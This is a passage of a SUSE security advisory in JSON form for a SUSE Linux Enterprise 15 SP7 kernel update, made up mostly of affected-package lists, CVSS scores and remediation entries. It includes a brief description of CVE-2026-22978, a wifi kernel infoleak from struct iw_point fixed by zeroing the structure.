"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2026-22977"
},
{
"cve": "CVE-2026-22978",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22978"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: avoid kernel-infoleak from struct iw_point\n\nstruct iw_point has a 32bit hole on 64bit arches.\n\nstruct iw_point {\n void __user *pointer; /* Pointer to the data (in user space) */\n __u16 length; /* number of fields or size in bytes */\n __u16 flags; /* Optional params */\n};\n\nMake sure to zero the structure to avoid disclosing 32bits of kernel data\nto user space.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22978",
"url": "https://www.suse.com/security/cve/CVE-2026-22978"
},
{
"category": "external",
"summary": "SUSE Bug 1257227 for CVE-2026-22978",
"url": "https://bugzilla.suse.com/1257227"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
